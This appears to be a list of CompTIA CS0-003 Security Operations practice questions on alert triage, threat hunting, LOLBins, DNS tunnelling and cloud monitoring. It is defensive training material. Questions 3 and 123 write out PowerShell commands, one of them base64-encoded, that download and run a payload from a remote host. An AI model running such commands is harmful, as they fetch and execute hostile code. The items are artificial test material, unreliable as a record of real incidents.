Practice CS0-003 Security Operations questions with full explanations on every answer.
1. A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?
2. During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?
3. An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?
4. A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?
5. A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?
6. An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?
7. During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?
8. A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?
9. An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?
10. A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?
11. An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?
12. A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?
13. A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)
14. A security analyst is conducting a proactive threat hunt for lateral movement techniques. The analyst examines EDR data for unusual parent-child process relationships. Which three process chains are indicative of lateral movement? (Select THREE.)
15. A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)
16. A security analyst reviews a SIEM alert that fired when a user successfully logged into a server from a remote IP address at 3 AM. The user is a system administrator who often works late. What is the most appropriate initial classification of this alert?
17. During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?
18. A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?
19. A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?
20. A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?
21. An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?
22. A cloud security analyst reviews AWS CloudTrail logs and notices multiple 'RunInstances' API calls from a single IAM user creating EC2 instances with public IP addresses in an unusual region. What is the most likely concern?
23. Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?
24. A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?
25. During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?
26. A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?
27. An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?
28. A security analyst is tuning a SIEM rule that generates alerts for any failed login attempt. The rule produces too many alerts, overwhelming the team. Which TWO actions would most effectively reduce false positives while maintaining detection of actual brute-force attacks?
29. A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?
30. An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?
31. A security analyst is reviewing a SIEM alert for a single failed login attempt from an internal IP address to a file server. The analyst determines this is a false positive. Which step should the analyst take next?
32. During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?
33. A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?
34. A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?
35. An analyst reviews AWS CloudTrail logs and detects multiple 'CreateNetworkAclEntry' API calls from a user who does not typically perform network administration. What type of activity is this?
36. A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?
37. During memory analysis of a compromised host, an analyst finds a process that appears to be 'svchost.exe' but with an unusual parent process (not 'services.exe'). The process also has injected code in its memory. What is the most likely explanation?
38. An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?
39. An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?
40. A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?
41. An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?
42. An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?
43. A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)
44. During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)
45. An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)
46. A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?
47. During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?
48. A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?
49. A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?
50. Which of the following log sources would be most useful for detecting DNS tunneling?
51. A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?
52. A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?
53. An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?
54. A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?
55. During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?
56. An analyst is reviewing a memory dump from a compromised workstation and finds a process that appears to be a legitimate system process but has a different parent process and is running from a non-standard location. Which analysis technique is most appropriate?
57. A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?
58. A security analyst is investigating a potential data exfiltration using DNS. Which TWO indicators are most consistent with DNS tunneling?
59. A threat hunter is using osquery to look for persistence mechanisms on a set of Windows endpoints. Which THREE registry keys or scheduled tasks should the hunter check for common persistence?
60. An analyst is configuring correlation rules in a SIEM. Which TWO data sources are essential for detecting lateral movement using pass-the-hash attacks?
61. A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?
62. During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?
63. A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?
64. An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?
65. A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?
66. Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?
67. A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?
68. An analyst is creating a YARA rule to detect a specific malware family that uses the string 'evil' in its PE file. Which of the following rule structures is correct?
69. During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?
70. An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?
71. Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?
72. An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?
73. A security analyst is reviewing network traffic and suspects a host is infected with malware that uses a domain generation algorithm (DGA) for C2 communication. Which two of the following indicators are most consistent with DGA activity?
74. During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?
75. An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?
76. A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?
77. A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?
78. During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?
79. A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?
80. A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?
81. An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?
82. A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?
83. Which tool would best allow a security analyst to capture and analyze packets in real time to investigate a network anomaly?
84. A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?
85. During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?
86. An analyst is reviewing a memory dump of a compromised system and notices that the memory of a legitimate process (e.g., notepad.exe) contains a PE header and executable code that is not part of the original binary. Which technique is most likely being used?
87. A security analyst is configuring a vulnerability scanner for internal network scanning. The analyst wants to ensure the scanner can identify missing patches and software configurations that require administrative privileges to read. Which scan type should the analyst configure?
88. A SOC analyst is investigating an alert from Azure Sentinel indicating a user account logged in from an unfamiliar location. The analyst wants to determine if this is a true positive. Which TWO additional log sources should the analyst correlate to make an informed decision?
89. A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?
90. An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?
91. A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?
92. During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?
93. A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?
94. A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?
95. During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?
96. A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?
97. Which of the following is the best data source for detecting DNS tunneling activity?
98. A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?
99. An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?
100. What is the primary purpose of performing credentialed vulnerability scans?
101. A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?
102. During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?
103. A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?
104. During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?
105. A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?
106. A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?
107. During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?
108. An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?
109. A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?
110. A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?
111. Which of the following is the primary purpose of log normalisation in a SIEM?
112. An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?
113. During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?
114. An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?
115. A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?
116. An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?
117. Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?
118. A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?
119. During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?
120. A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?
121. A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?
122. During a network traffic analysis, a security analyst notices a host communicating with an external IP address over TCP port 443 using a self-signed certificate. The traffic flows are consistent in size and occur every 60 seconds. The external IP is not on any threat intelligence feeds. What does this pattern most likely indicate?
123. An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?
124. A security analyst is tuning a SIEM correlation rule that generates alerts when a single user logs into more than 10 workstations within 5 minutes. The rule is producing excessive false positives due to service accounts performing automated tasks. Which of the following is the best tuning approach to reduce false positives while still detecting potential lateral movement?
125. During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?
126. A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?
127. A threat hunter is reviewing osquery data from endpoints and notices that the Windows Registry key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' contains an entry for 'C:\Users\Public\svchost.exe'. Which of the following best describes the significance of this finding?
128. A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?
129. An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?
130. A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?
131. During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?
132. A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?
133. A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)
134. A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)
135. A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)
136. A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?
137. During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?
138. An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?
139. An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?
140. A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?
141. An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?
142During a threat hunting exercise, the hunter creates a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which ATT&CK technique should the hunter focus on?
143A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?
144An analyst is reviewing a packet capture and notices a TCP connection with the following sequence: SYN, SYN-ACK, ACK, SYN, ACK. What does this pattern indicate?
145A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?
146An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?
147A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?
148An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)
149A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)
150An analyst is reviewing cloud audit logs from AWS CloudTrail and notices an API call to create an IAM user with administrative privileges from an IP address outside the corporate network. Which TWO actions should the analyst take first? (Select TWO.)
151A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?
152During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?
153A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?
154During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?
155A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?
156A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?
157During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?
158A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?
159A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?
160A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?
161A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?
162During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?
163A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?
164A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?
165A security analyst is analyzing a PCAP file from a network incident and notices a series of TCP connections with unusual flag combinations. Specifically, the SYN flag is set but the ACK flag is not set in the response, and the sequence numbers are not incrementing properly. The analyst suspects a TCP handshake manipulation. Which THREE TCP anomalies should the analyst document?
The Security Operations domain covers the key concepts tested in this area of the CS0-003 exam blueprint published by CompTIA. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CS0-003 domains — no account required.
The Courseiva CS0-003 question bank contains 165 questions in the Security Operations domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Security Operations domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.